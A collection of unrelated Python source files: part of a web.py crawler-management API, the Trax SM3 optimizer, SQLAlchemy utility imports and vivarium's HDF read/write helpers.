        # BUG FIX: was web.input(spider=None); without a default for `source`,
        # accessing params.source raised AttributeError when it was missing.
        params = web.input(source=None)
        web.header('Content-Type', 'text/plain; charset=UTF-8')
        web.header('Access-Control-Allow-Origin', '*')
        source = params.source
        if source is None:
            return 'Missing source name: source=...'
        response = uc.delete(source)
        return response
class startcrawl:
    """Start a spider and redirect to the service's status URL."""
    docs['startcrawl'] = [
        ('method', 'GET'),
        ('path', '/crawler/startcrawl?spider=...'),
        ('description', 'start spider')
    ]
    def GET(self):
        params = web.input(spider=None)
        web.header('Content-Type', 'text/plain; charset=UTF-8')
        web.header('Access-Control-Allow-Origin', '*')
        spider = params.spider
        # `not spider` covers both None and '' (idiomatic `is None` check).
        if not spider:
            return 'Missing spider name: spider=...'
        response = ss.startCrawl(spider)
        raise web.seeother(response)
class stopcrawl:
    """Stop a spider and redirect to the service's status URL."""
    docs['stopcrawl'] = [
        ('method', 'GET'),
        ('path', '/crawler/stopcrawl?spider=...'),
        ('description', 'stop spider')
    ]
    def GET(self):
        params = web.input(spider=None)
        web.header('Content-Type', 'text/plain; charset=UTF-8')
        web.header('Access-Control-Allow-Origin', '*')
        spider = params.spider
        # Identity comparison instead of `== None`.
        if spider is None:
            return 'Missing spider name: spider=...'
        response = ss.stopCrawl(spider)
        raise web.seeother(response)
class taillog:
    """Return the last N lines of a spider's log."""
    docs['taillog'] = [
        ('method', 'GET'),
        ('path', '/crawler/taillog?spider=...&number=...'),
        ('description', 'view log of a spider given last number of log lines')
    ]
    def GET(self):
        params = web.input(spider=None, number=100, files=None)
        web.header('Content-Type', 'text/plain; charset=UTF-8')
        web.header('Access-Control-Allow-Origin', '*')
        spider = params.spider
        numberLine = params.number
        files = params.files
        # Identity comparison instead of `== None`.
        if spider is None:
            return 'Missing spider name: spider=...'
        response = ss.tailLog(spider, numberLine, files)
        return response
class crawlProduct:
docs['crawl_product'] = [
('method', 'GET'),
('path', '/crawler/crawl_product?url=...'),
('description', 'crawl an item from given url')
]
def GET(self):
params = web.input(url = None)
web.header('Content-Type', 'application/json; charset=UTF-8')
web.header('Access-Control-Allow-Origin','*')
import urllib
url = urllib.unquote_plus(params.url)
if url == None: return 'Missing url: url =...'
print "Crawling ..." + url
response = cus.crawlProduct(url)
return json.dumps(response.__dict__)
class thread_count:
    docs['thread_count'] = [
        ('method', 'GET'),
        ('path', '/crawler/thread_count'),
        ('description', 'Count the number of crawling service currently started')
    ]
    def GET(self):
        """Return the crawler service's thread count, JSON-encoded."""
        web.header('Content-Type', 'text/plain; charset=UTF-8')
        web.header('Access-Control-Allow-Origin','*')
        response = json.dumps(ss.threadCount())
        return response
class crawled_products:
    docs['crawled_products'] = [
        ('method', 'GET'),
        ('description', 'Get list of crawled items by some criterias'),
        ('path', '/stats/crawled_products?start=...&limit=...&source=...&sincedays=...&beforeday=...&facetsize=...&missing=...&expired=true/false'),
        ('param missing', 'list of field name seperated by ,. example: missing=price,category')
    ]
    def GET(self):
        """List crawled items filtered by the optional query parameters."""
        web.header('Content-Type', 'application/json; charset=UTF-8')
        web.header('Access-Control-Allow-Origin','*')
        # All filters are optional; web.input supplies the defaults.
        params = web.input(start = 0, limit = 10, sincedays = None, beforedays = None, source = None, facetsize = 100, missing = None, exists = None, expired = None, sort=None)
        start = int(params.start)
        limit = int(params.limit)
        sincedays = params.sincedays
        beforedays = params.beforedays
        facetsize = int(params.facetsize)
        missing = params.missing
        exists = params.exists
        source = params.source
        expired = params.expired
        sort = params.sort
        response = cps.getItems(start, limit, sincedays, beforedays, source, facetsize, missing, exists, expired,sort)
        return json.dumps(response)
class debugCrawler:
    docs['debugCrawler'] = [
        ('method', 'GET'),
        ('path', '/crawler/debugCrawler'),
        ('description', 'return list spiders not running, missing, duplicate')
    ]
    def GET(self):
        """Return the monitor service's crawler diagnostics as JSON."""
        web.header('Content-Type', 'application/json; charset=UTF-8')
        web.header('Access-Control-Allow-Origin','*')
        return json.dumps(mcs.get_debugCrawler())
class fixBug:
    """Ask the monitor service to fix spiders that are not running."""
    # FIX: the description was copy-pasted from debugCrawler; this endpoint
    # repairs non-running spiders rather than listing them.
    docs['fixBug'] = [
        ('method', 'GET'),
        ('path', '/crawler/debugCrawler/fixBug'),
        ('description', 'fix spiders that are not running')
    ]
    def GET(self):
        web.header('Content-Type', 'application/json; charset=UTF-8')
        web.header('Access-Control-Allow-Origin', '*')
        return json.dumps(mcs.fixBugSpiderNotRun(None))
class insert_spider:
    """Insert a new spider document (request body is JSON) into MongoDB."""
    # FIX: the handler is POST, but the help metadata claimed GET.
    docs['insert_spider'] = [
        ('method', 'POST'),
        ('path', '/crawler/insert_spider'),
        ('description', 'Insert new spider to mongodb')
    ]
    def POST(self):
        web.header('Content-Type', 'application/json; charset=UTF-8')
        web.header('Access-Control-Allow-Origin', '*')
        document = web.data()
        return ss.insertSpider(json.loads(document))
class spider_history:
    docs['spider_history'] = [
        ('method', 'GET'),
        ('path', '/crawler/spider_history?spider_name=...'),
        ('description', 'return history crawler of spider')
    ]
    def GET(self):
        """Return the crawl history for the named spider."""
        web.header('Content-Type', 'application/json; charset=UTF-8')
        web.header('Access-Control-Allow-Origin', '*')
        parms = web.input(spider_name=None)
        spider_name = parms.spider_name
        if spider_name:
            return ss.get_spider_history(spider_name)
        return "Missing spider name!"
class number_spiders_started:
    docs['number spiders started'] = [
        ('method', 'GET'),
        ('path', '/kpi/spiders_started?days=...'),
        ('description', 'return number spider started in a day')
    ]
    def GET(self):
        """KPI: count of spiders started within the last `days` days."""
        web.header('Content-Type', 'application/json; charset=UTF-8')
        web.header('Access-Control-Allow-Origin', '*')
        parms = web.input(days=None)
        days = parms.days
        if days:
            return json.dumps(ss.get_number_spiders_started(int(days)))
        return "Missing day parameter!"
class number_spiders_stopped:
    docs['number spiders stopped'] = [
        ('method', 'GET'),
        ('path', '/kpi/spiders_stopped?days=...'),
        ('description', 'return number spider stopped in a day')
    ]
    def GET(self):
        """KPI: count of spiders stopped within the last `days` days."""
        web.header('Content-Type', 'application/json; charset=UTF-8')
        web.header('Access-Control-Allow-Origin', '*')
        parms = web.input(days=None)
        days = parms.days
        if days:
            return json.dumps(ss.get_number_spiders_stopped(int(days)))
        return "Missing day parameter!"
class number_spiders_created:
    docs['number spiders created'] = [
        ('method', 'GET'),
        ('path', '/kpi/spiders_created?days=...'),
        ('description', 'return number spiders created in a day')
    ]
    def GET(self):
        """KPI: count of spiders created within the last `days` days."""
        web.header('Content-Type', 'application/json; charset=UTF-8')
        web.header('Access-Control-Allow-Origin', '*')
        parms = web.input(days=None)
        days = parms.days
        if days:
            return json.dumps(ss.get_number_spider_created(int(days)))
        return "Missing day parameter!"
class number_items_crawled:
    """KPI: count of items crawled within the last `days` days."""
    docs['number items crawled'] = [
        ('method', 'GET'),
        ('path', '/kpi/items_crawled?days=...'),
        ('description', 'return number items crawled in a day')
    ]
    def GET(self):
        web.header('Content-Type', 'application/json; charset=UTF-8')
        web.header('Access-Control-Allow-Origin', '*')
        parms = web.input(days=None)
        days = parms.days
        if days:
            # Delegates to the local /stats endpoint and extracts the total.
            res = json.loads(requests.get('http://localhost:6081/stats/crawled_products?missing=expired&sincedays=' + days).text)
            # FIX: web.py handlers must return a string; the old code
            # returned the raw JSON number (an int).
            return str(res['total_items'])
        return "Missing day parameter!"
class update_category_blacklist:
    docs['update category blacklist'] = [
        ('method', 'GET'),
        ('path', '/crawler/update_category_blacklist'),
        ('description', 'update category blacklist from mongodb')
    ]
    def GET(self):
        """Reload the category blacklist from MongoDB into the service."""
        web.header('Content-Type', 'application/json; charset=UTF-8')
        web.header('Access-Control-Allow-Origin', '*')
        ss.update_category_blacklist()
        return 'Success!'
def main():
    """Change into the crawl directory and serve the scraper API."""
    os.chdir(config.CRAWL_DIR)
    app = web.application(urls, globals())
    # Log before app.run(): it blocks until the server shuts down, so the
    # old post-run logging never appeared while the service was live.
    logging.info('Start Done!')
    app.run()

if __name__ == '__main__':
    main()
|
# coding=utf-8
# Copyright 2021 The Trax Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""SM3 optimizer class."""
import enum
from trax.fastmath import numpy as jnp
from trax.optimizers import base as opt_base
class MomentumType(enum.IntEnum):
    """Momentum update rules supported by SM3 (see SM3._momentum_update)."""
    EMA = 1          # exponential moving average of gradients
    HEAVY_BALL = 2   # classical heavy-ball accumulation
    NESTEROV = 3     # Nesterov-style lookahead on the accumulated momentum
class SM3(opt_base.Optimizer):
    """SM3 optimizer, as described in https://arxiv.org/abs/1901.11150."""

    def __init__(self,
                 learning_rate=0.01,
                 momentum=0.9,
                 second_moment_averaging=1.0,
                 weight_decay=0.0,
                 momentum_type=MomentumType.EMA):  # pylint: disable=useless-super-delegation
        """Create the SM3 optimizer.

        Memory-Efficient Adaptive Optimization.
        https://arxiv.org/abs/1901.11150

        Args:
          learning_rate: a positive scalar value for the initial learning rate.
          momentum: optional, a positive scalar value for momentum
          second_moment_averaging: averaging of second moments (if 1.0, adds from
            beginning of time like AdaGrad).
          weight_decay: Weight decay for regularizing the model.
          momentum_type: Nesterov, Heavy-Ball or EMA (Default).
        """
        self._has_momentum = momentum > 0.0
        self._momentum_type = momentum_type
        # Grafting is only active when second moments are averaged (!= 1.0).
        self._graft = second_moment_averaging != 1.0
        super().__init__(
            learning_rate=learning_rate,
            momentum=momentum,
            second_moment_averaging=second_moment_averaging,
            weight_decay=weight_decay,
        )

    def init(self, w):
        """Create slots: optional momentum buffer plus one second-moment
        accumulator vector per tensor dimension (the SM3 "cover")."""
        momentum = []
        if self._has_momentum:
            momentum = jnp.zeros_like(w)
        v1s = [jnp.zeros(sz, dtype=w.dtype) for sz in w.shape]
        v2s = []
        if self._graft:
            v2s = [jnp.zeros(sz, dtype=w.dtype) for sz in w.shape]
        return (momentum, v1s, v2s)

    def _momentum_update(self, g, m, beta1):
        """Handle various types of momentum; returns (new_m, update)."""
        if self._momentum_type == MomentumType.EMA:
            m = (1 - beta1) * g + beta1 * m
            update = m
        elif self._momentum_type == MomentumType.HEAVY_BALL:
            m = g + beta1 * m
            update = m
        elif self._momentum_type == MomentumType.NESTEROV:
            m = g + beta1 * m
            nesterov_m = g + beta1 * m
            update = nesterov_m
        else:
            assert False, 'Unknown momentum_type.'
        return m, update

    def _update_diagonal(self, g, w, m, v1, v2, opt_params):
        """Update for rank-1 parameters (plain diagonal second moments)."""
        learning_rate = opt_params['learning_rate']
        beta2 = opt_params['second_moment_averaging']
        weight_decay = opt_params['weight_decay']

        is_beta2_1 = (beta2 == 1).astype(g.dtype)
        # 1.0 when beta2 == 1 (AdaGrad-style accumulation from the beginning
        # of time), otherwise (1 - beta2) for an exponential moving average.
        # BUG FIX: this scalar was previously assigned to `w`, clobbering the
        # weights -- weight decay and the returned parameters then used the
        # scalar instead of the actual weight tensor.
        mixing_rate = is_beta2_1 + (1.0 - beta2) * (1.0 - is_beta2_1)
        v1[0] = beta2 * v1[0] + mixing_rate * g * g
        preconditioner = jnp.where(v1[0] > 0, 1.0 / (jnp.sqrt(v1[0]) + 1e-16),
                                   jnp.zeros_like(v1[0]))
        pg = preconditioner * g
        if self._graft:
            # Graft the magnitude of the AdaGrad step onto the averaged step.
            v2[0] += g * g
            preconditioner_graft = jnp.where(
                v2[0] > 0, 1.0 / (jnp.sqrt(v2[0]) + 1e-16), jnp.zeros_like(v2[0]))
            pg_graft = preconditioner_graft * g
            pg_norm = jnp.linalg.norm(pg)
            pg_graft_norm = jnp.linalg.norm(pg_graft)
            pg = pg * (pg_graft_norm / (pg_norm + 1e-16))
        # Decoupled weight decay on the actual weights.
        pg = pg + w * weight_decay
        if self._has_momentum:
            m, update = self._momentum_update(pg, m, opt_params['momentum'])
        else:
            update = pg
        w = w - (update * learning_rate).astype(w.dtype)
        return w, (m, v1, v2)

    def _expanded_shape(self, shape, axis):
        # Replaces a `shape` of [M, N, K] with 1 in all dimensions except for
        # `axis`. For eg: axis = 1 returns [1, N, 1].
        rank = len(shape)
        return [1] * axis + [shape[axis]] + [1] * (rank - axis - 1)

    def _minimum(self, tensor_list):
        """Elementwise minimum across a list of broadcastable tensors."""
        minimum = tensor_list[0]
        for i in range(1, len(tensor_list)):
            minimum = jnp.minimum(minimum, tensor_list[i])
        return minimum

    def _update_sketched(self, g, w, m, v1, v2, opt_params):
        """Update for higher-rank parameters."""
        learning_rate = opt_params['learning_rate']
        momentum = opt_params['momentum']
        beta2 = opt_params['second_moment_averaging']
        weight_decay = opt_params['weight_decay']

        shape = w.shape
        rank = len(shape)
        # Reconstruct the full second-moment estimate as the elementwise
        # minimum of the per-axis accumulator vectors.
        reshaped_accumulators = [jnp.reshape(v1[i], self._expanded_shape(shape, i))
                                 for i in range(rank)]
        acc = self._minimum(reshaped_accumulators)

        is_beta2_1 = (beta2 == 1).astype(g.dtype)
        # Same fix as in _update_diagonal: keep the mixing coefficient in its
        # own variable instead of overwriting the weights `w`.
        mixing_rate = is_beta2_1 + (1.0 - beta2) * (1.0 - is_beta2_1)
        acc = beta2 * acc + mixing_rate * g * g

        preconditioner = jnp.where(acc > 0.0, 1.0 / (jnp.sqrt(acc) + 1e-16),
                                   jnp.zeros_like(acc))
        pg = g * preconditioner
        if self._graft:
            v2_acc = self._minimum([
                jnp.reshape(v2[i], self._expanded_shape(shape, i))
                for i in range(rank)
            ])
            v2_acc = v2_acc + g * g
            preconditioner_graft = jnp.where(v2_acc > 0.0,
                                             1.0 / (jnp.sqrt(v2_acc) + 1e-16),
                                             jnp.zeros_like(v2_acc))
            pg_graft = preconditioner_graft * g
            pg_norm = jnp.linalg.norm(pg)
            pg_graft_norm = jnp.linalg.norm(pg_graft)
            pg = pg * (pg_graft_norm / (pg_norm + 1e-16))
        # Decoupled weight decay on the actual weights.
        pg = pg + w * weight_decay
        if self._has_momentum:
            m, update = self._momentum_update(pg, m, momentum)
        else:
            update = pg
        w = w - (learning_rate * update).astype(w.dtype)
        # Fold the updated full accumulator back into the per-axis vectors
        # by taking the max over all other axes.
        for i in range(len(v1)):
            axes = list(range(int(i))) + list(range(int(i) + 1, rank))
            dim_accumulator = jnp.amax(acc, axis=axes)
            v1[i] = dim_accumulator
        if self._graft:
            for i in range(len(v2)):
                axes = list(range(int(i))) + list(range(int(i) + 1, rank))
                dim_accumulator = jnp.amax(v2_acc, axis=axes)
                v2[i] = dim_accumulator
        return w, (m, v1, v2)

    def update(self, step, g, w, slots, opt_params):
        """Apply one SM3 step: sketched update for rank > 1, else diagonal."""
        del step  # The update rule does not depend on the step count.
        m, v1, v2 = slots
        rank = len(w.shape)
        if rank > 1:
            return self._update_sketched(g, w, m, v1, v2, opt_params)
        else:
            return self._update_diagonal(g, w, m, v1, v2, opt_params)
|
<filename>lib/sqlalchemy/util/__init__.py
# util/__init__.py
# Copyright (C) 2005-2022 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: https://www.opensource.org/licenses/mit-license.php
from collections import defaultdict as defaultdict
from functools import partial as partial
from functools import update_wrapper as update_wrapper
from ._collections import coerce_generator_arg as coerce_generator_arg
from ._collections import coerce_to_immutabledict as coerce_to_immutabledict
from ._collections import column_dict as column_dict
from ._collections import column_set as column_set
from ._collections import EMPTY_DICT as EMPTY_DICT
from ._collections import EMPTY_SET as EMPTY_SET
from ._collections import FacadeDict as FacadeDict
from ._collections import flatten_iterator as flatten_iterator
from ._collections import has_dupes as has_dupes
from ._collections import has_intersection as has_intersection
from ._collections import IdentitySet as IdentitySet
from ._collections import ImmutableContainer as ImmutableContainer
from ._collections import immutabledict as immutabledict
from ._collections import ImmutableProperties as ImmutableProperties
from ._collections import LRUCache as LRUCache
from ._collections import merge_lists_w_ordering as merge_lists_w_ordering
from ._collections import ordered_column_set as ordered_column_set
from ._collections import OrderedDict as OrderedDict
from ._collections import OrderedIdentitySet as OrderedIdentitySet
from ._collections import OrderedProperties as OrderedProperties
from ._collections import OrderedSet as OrderedSet
from ._collections import PopulateDict as PopulateDict
from ._collections import Properties as Properties
from ._collections import ScopedRegistry as ScopedRegistry
from ._collections import sort_dictionary as sort_dictionary
from ._collections import ThreadLocalRegistry as ThreadLocalRegistry
from ._collections import to_column_set as to_column_set
from ._collections import to_list as to_list
from ._collections import to_set as to_set
from ._collections import unique_list as unique_list
from ._collections import UniqueAppender as UniqueAppender
from ._collections import update_copy as update_copy
from ._collections import WeakPopulateDict as WeakPopulateDict
from ._collections import WeakSequence as WeakSequence
from ._preloaded import preload_module as preload_module
from ._preloaded import preloaded as preloaded
from .compat import arm as arm
from .compat import b as b
from .compat import b64decode as b64decode
from .compat import b64encode as b64encode
from .compat import cmp as cmp
from .compat import cpython as cpython
from .compat import dataclass_fields as dataclass_fields
from .compat import decode_backslashreplace as decode_backslashreplace
from .compat import dottedgetter as dottedgetter
from .compat import has_refcount_gc as has_refcount_gc
from .compat import inspect_getfullargspec as inspect_getfullargspec
from .compat import local_dataclass_fields as local_dataclass_fields
from .compat import osx as osx
from .compat import py38 as py38
from .compat import py39 as py39
from .compat import pypy as pypy
from .compat import win32 as win32
from .concurrency import await_fallback as await_fallback
from .concurrency import await_only as await_only
from .concurrency import greenlet_spawn as greenlet_spawn
from .concurrency import is_exit_exception as is_exit_exception
from .deprecations import became_legacy_20 as became_legacy_20
from .deprecations import deprecated as deprecated
from .deprecations import deprecated_cls as deprecated_cls
from .deprecations import deprecated_params as deprecated_params
from .deprecations import deprecated_property as deprecated_property
from .deprecations import moved_20 as moved_20
from .deprecations import warn_deprecated as warn_deprecated
from .langhelpers import add_parameter_text as add_parameter_text
from .langhelpers import as_interface as as_interface
from .langhelpers import asbool as asbool
from .langhelpers import asint as asint
from .langhelpers import assert_arg_type as assert_arg_type
from .langhelpers import attrsetter as attrsetter
from .langhelpers import bool_or_str as bool_or_str
from .langhelpers import chop_traceback as chop_traceback
from .langhelpers import class_hierarchy as class_hierarchy
from .langhelpers import classproperty as classproperty
from .langhelpers import clsname_as_plain_name as clsname_as_plain_name
from .langhelpers import coerce_kw_type as coerce_kw_type
from .langhelpers import constructor_copy as constructor_copy
from .langhelpers import constructor_key as constructor_key
from .langhelpers import counter as counter
from .langhelpers import create_proxy_methods as create_proxy_methods
from .langhelpers import decode_slice as decode_slice
from .langhelpers import decorator as decorator
from .langhelpers import dictlike_iteritems as dictlike_iteritems
from .langhelpers import duck_type_collection as duck_type_collection
from .langhelpers import ellipses_string as ellipses_string
from .langhelpers import EnsureKWArg as EnsureKWArg
from .langhelpers import format_argspec_init as format_argspec_init
from .langhelpers import format_argspec_plus as format_argspec_plus
from .langhelpers import generic_fn_descriptor as generic_fn_descriptor
from .langhelpers import generic_repr as generic_repr
from .langhelpers import get_annotations as get_annotations
from .langhelpers import get_callable_argspec as get_callable_argspec
from .langhelpers import get_cls_kwargs as get_cls_kwargs
from .langhelpers import get_func_kwargs as get_func_kwargs
from .langhelpers import getargspec_init as getargspec_init
from .langhelpers import has_compiled_ext as has_compiled_ext
from .langhelpers import HasMemoized as HasMemoized
from .langhelpers import hybridmethod as hybridmethod
from .langhelpers import hybridproperty as hybridproperty
from .langhelpers import inject_docstring_text as inject_docstring_text
from .langhelpers import iterate_attributes as iterate_attributes
from .langhelpers import map_bits as map_bits
from .langhelpers import md5_hex as md5_hex
from .langhelpers import memoized_instancemethod as memoized_instancemethod
from .langhelpers import memoized_property as memoized_property
from .langhelpers import MemoizedSlots as MemoizedSlots
from .langhelpers import method_is_overridden as method_is_overridden
from .langhelpers import methods_equivalent as methods_equivalent
from .langhelpers import (
monkeypatch_proxied_specials as monkeypatch_proxied_specials,
)
from .langhelpers import non_memoized_property as non_memoized_property
from .langhelpers import NoneType as NoneType
from .langhelpers import only_once as only_once
from .langhelpers import (
parse_user_argument_for_enum as parse_user_argument_for_enum,
)
from .langhelpers import PluginLoader as PluginLoader
from .langhelpers import portable_instancemethod as portable_instancemethod
from .langhelpers import quoted_token_parser as quoted_token_parser
from .langhelpers import safe_reraise as safe_reraise
from .langhelpers import set_creation_order as set_creation_order
from .langhelpers import string_or_unprintable as string_or_unprintable
from .langhelpers import symbol as symbol
from .langhelpers import TypingOnly as TypingOnly
from .langhelpers import (
unbound_method_to_callable as unbound_method_to_callable,
)
from .langhelpers import walk_subclasses as walk_subclasses
from .langhelpers import warn as warn
from .langhelpers import warn_exception as warn_exception
from .langhelpers import warn_limited as warn_limited
from .langhelpers import wrap_callable as wrap_callable
|
<filename>src/vivarium/framework/artifact/hdf.py
"""
=============
HDF Interface
=============
A convenience wrapper around the `tables <https://www.pytables.org>`_ and
:mod:`pandas` HDF interfaces.
Public Interface
----------------
The public interface consists of 5 functions:
.. list-table:: HDF Public Interface
:widths: 20 60
:header-rows: 1
* - Function
- Description
* - :func:`touch`
- Creates an HDF file, wiping an existing file if necessary.
* - :func:`write`
- Stores data at a key in an HDF file.
* - :func:`load`
- Loads (potentially filtered) data from a key in an HDF file.
* - :func:`remove`
- Clears data from a key in an HDF file.
* - :func:`get_keys`
- Gets all available HDF keys from an HDF file.
Contracts
+++++++++
- All functions in the public interface accept both :class:`pathlib.Path` and
normal Python :class:`str` objects for paths.
- All functions in the public interface accept only :class:`str` objects
as representations of the keys in the hdf file. The strings must be
formatted as ``"type.name.measure"`` or ``"type.measure"``.
"""
import json
from pathlib import Path
from typing import Any, List, Optional, Union
import re
import pandas as pd
import tables
from tables.nodes import filenode
# Types stored via the pandas HDF machinery; everything else is json-encoded
# into a filenode (see `write`).
PandasObj = (pd.DataFrame, pd.Series)
####################
# Public interface #
####################
def touch(path: Union[str, Path]):
    """Create an empty HDF file at ``path``, replacing any existing file.

    Parameters
    ----------
    path
        The path to the HDF file.

    Raises
    ------
    ValueError
        If ``path`` does not carry a valid HDF suffix.
    """
    validated = _get_valid_hdf_path(path)
    # Opening in write mode truncates the file; closing immediately leaves
    # an empty, valid HDF file behind.
    with tables.open_file(str(validated), mode='w'):
        pass
def write(path: Union[str, Path], entity_key: str, data: Any):
    """Write ``data`` under ``entity_key`` in the HDF file at ``path``.

    Parameters
    ----------
    path
        The path to the HDF file to write to.
    entity_key
        A string representation of the internal HDF path where we want to
        write the data. The key must be formatted as ``"type.name.measure"``
        or ``"type.measure"``.
    data
        The data to write. pandas objects are written through the pandas
        HDF machinery; any other Python object is json-encoded with
        :func:`json.dumps` and stored as a filenode.

    Raises
    ------
    ValueError
        If the path or entity_key are improperly formatted.
    """
    hdf_path = _get_valid_hdf_path(path)
    key = EntityKey(entity_key)
    # Dispatch on the payload type: pandas objects vs. json-serializable ones.
    writer = _write_pandas_data if isinstance(data, PandasObj) else _write_json_blob
    writer(hdf_path, key, data)
def load(path: Union[str, Path], entity_key: str, filter_terms: Optional[List[str]],
         column_filters: Optional[List[str]]) -> Any:
    """Loads data from an HDF file.

    Parameters
    ----------
    path
        The path to the HDF file to load the data from.
    entity_key
        A representation of the internal HDF path where the data is located.
    filter_terms
        An optional list of terms used to filter the rows in the data.
        The terms must be formatted in a way that is suitable for use with
        the ``where`` argument of :func:`pandas.read_hdf`. Only
        filters applying to existing columns in the data are used.
    column_filters
        An optional list of columns to load from the data.

    Raises
    ------
    ValueError
        If the path or entity_key are improperly formatted.

    Returns
    -------
    Any
        The data stored at the given key in the HDF file.
    """
    path = _get_valid_hdf_path(path)
    entity_key = EntityKey(entity_key)
    with tables.open_file(str(path)) as file:
        node = file.get_node(entity_key.path)
        if isinstance(node, tables.earray.EArray):
            # EArray nodes hold json-encoded documents written by
            # _write_json_blob, not pandas dataframes.
            with filenode.open_node(node) as file_node:
                data = json.load(file_node)
        else:
            # Drop filter terms that reference columns missing from the table,
            # since read_hdf's `where` rejects unknown names.
            filter_terms = _get_valid_filter_terms(filter_terms, node.table.colnames)
            with pd.HDFStore(str(path), complevel=9, mode='r') as store:
                metadata = store.get_storer(entity_key.path).attrs.metadata  # NOTE: must use attrs. write this up
            if metadata.get('is_empty', False):
                data = pd.read_hdf(path, entity_key.path, where=filter_terms)
                # Undo the reset_index() applied on write for index-only frames.
                data = data.set_index(list(data.columns))
            else:
                data = pd.read_hdf(path, entity_key.path, where=filter_terms, columns=column_filters)
    return data
def remove(path: Union[str, Path], entity_key: str):
    """Delete the data stored under ``entity_key`` from the HDF file.

    Parameters
    ----------
    path :
        The path to the HDF file to remove the data from.
    entity_key :
        A representation of the internal HDF path where the data is located.

    Raises
    ------
    ValueError
        If the path or entity_key are improperly formatted.
    """
    hdf_path = _get_valid_hdf_path(path)
    key = EntityKey(entity_key)
    with tables.open_file(str(hdf_path), mode='a') as file:
        # Recursive removal also clears any children beneath the node.
        file.remove_node(key.path, recursive=True)
def get_keys(path: str) -> List[str]:
    """Return key representations of every internal path in the HDF file.

    Parameters
    ----------
    path :
        The path to the HDF file.

    Returns
    -------
    List[str]
        A list of key representations of the internal paths in the HDF.
    """
    hdf_path = _get_valid_hdf_path(path)
    with tables.open_file(str(hdf_path)) as file:
        return _get_keys(file.root)
class EntityKey(str):
    """A convenience wrapper that translates artifact keys.

    This class provides several representations of the artifact keys that
    are useful when working with the :mod:`pandas` and
    `tables <https://www.pytables.org>`_ HDF interfaces.
    """

    def __init__(self, key):
        """
        Parameters
        ----------
        key
            The string representation of the entity key. Must be formatted
            as ``"type.name.measure"`` or ``"type.measure"``.
        """
        pieces = key.split('.')
        non_empty = [piece for piece in pieces if piece]
        # Reject keys with the wrong number of elements as well as keys that
        # contain empty elements (e.g. "a..b" or leading/trailing dots).
        if len(non_empty) not in (2, 3) or len(pieces) != len(non_empty):
            raise ValueError(f'Invalid format for HDF key: {key}. '
                             'Acceptable formats are "type.name.measure" and "type.measure"')
        super().__init__()

    @property
    def type(self) -> str:
        """The type of the entity represented by the key."""
        return self.split('.')[0]

    @property
    def name(self) -> str:
        """The name of the entity represented by the key."""
        pieces = self.split('.')
        return pieces[1] if len(pieces) == 3 else ''

    @property
    def measure(self) -> str:
        """The measure associated with the data represented by the key."""
        return self.split('.')[-1]

    @property
    def group_prefix(self) -> str:
        """The HDF group prefix for the key."""
        if self.name:
            return '/' + self.type
        return '/'

    @property
    def group_name(self) -> str:
        """The HDF group name for the key."""
        return self.name or self.type

    @property
    def group(self) -> str:
        """The full path to the group for this key."""
        if self.name:
            return self.group_prefix + '/' + self.group_name
        return self.group_prefix + self.group_name

    @property
    def path(self) -> str:
        """The full HDF path associated with this key."""
        return self.group + '/' + self.measure

    def with_measure(self, measure: str) -> 'EntityKey':
        """Return a new key with this key's measure replaced.

        Parameters
        ----------
        measure :
            The measure to replace this key's measure with.

        Returns
        -------
        EntityKey
            A new EntityKey with the updated measure.
        """
        if self.name:
            return EntityKey(f'{self.type}.{self.name}.{measure}')
        return EntityKey(f'{self.type}.{measure}')

    def __eq__(self, other: 'EntityKey') -> bool:
        return isinstance(other, str) and str(self) == str(other)

    def __ne__(self, other: 'EntityKey') -> bool:
        return not self == other

    def __hash__(self):
        return hash(str(self))

    def __repr__(self) -> str:
        return f'EntityKey({str(self)})'
#####################
# Private utilities #
#####################
def _get_valid_hdf_path(path: Union[str, Path]) -> Path:
    """Coerce ``path`` to a :class:`pathlib.Path` and validate its suffix."""
    candidate = Path(path)
    valid_suffixes = ['.hdf', '.h5']
    # Only .hdf and .h5 files are recognized as HDF stores.
    if candidate.suffix not in valid_suffixes:
        raise ValueError(f'{str(candidate)} has an invalid HDF suffix {candidate.suffix}.'
                         f' HDF files must have one of {valid_suffixes} as a path suffix.')
    return candidate
def _write_pandas_data(path: Path, entity_key: EntityKey, data: Union[PandasObj]):
    """Write a :class:`pandas.DataFrame` or :class:`pandas.Series` to HDF.

    Index-only (empty) frames are converted so their index becomes regular
    columns before writing, because ``store.put`` silently fails to write an
    empty table-format frame; a metadata flag records the transform so that
    ``load`` can undo it.
    """
    if not data.empty:
        metadata = {'is_empty': False}
        data_columns = None
    else:
        # Move the index into columns so there is something to store.
        data = data.reset_index()
        if data.empty:
            raise ValueError("Cannot write an empty dataframe that does not have an index.")
        metadata = {'is_empty': True}
        data_columns = True
    with pd.HDFStore(str(path), complevel=9) as store:
        store.put(entity_key.path, data, format="table", data_columns=data_columns)
        # Metadata must be stashed on the storer's attrs to survive round-trips.
        store.get_storer(entity_key.path).attrs.metadata = metadata
def _write_json_blob(path: Path, entity_key: EntityKey, data: Any):
    """Serialize ``data`` as json and store it as a filenode in the HDF file."""
    with tables.open_file(str(path), "a") as store:
        # Create the intermediate groups on demand before writing the leaf.
        if entity_key.group_prefix not in store:
            store.create_group('/', entity_key.type)
        if entity_key.group not in store:
            store.create_group(entity_key.group_prefix, entity_key.group_name)
        with filenode.new_node(store, where=entity_key.group, name=entity_key.measure) as fnode:
            fnode.write(json.dumps(data).encode("utf-8"))
def _get_keys(root: tables.node.Node, prefix: str = '') -> List[str]:
    """Recursively translate the HDF paths under ``root`` into dotted keys."""
    keys = []
    for child in root:
        child_name = _get_node_name(child)
        if isinstance(child, tables.earray.EArray):
            # A filenode leaf: this child terminates the key.
            keys.append(f'{prefix}.{child_name}')
        elif isinstance(child, tables.table.Table):
            # A pandas table: the enclosing group already names the key.
            keys.append(prefix)
        else:
            deeper_prefix = f'{prefix}.{child_name}' if prefix else child_name
            keys.extend(_get_keys(child, deeper_prefix))
    # Drop the pandas bookkeeping groups written alongside dataframes.
    return [k for k in keys if '.meta.' not in k]
def _get_node_name(node: tables.node.Node) -> str:
    """Extract a node's name from its string representation."""
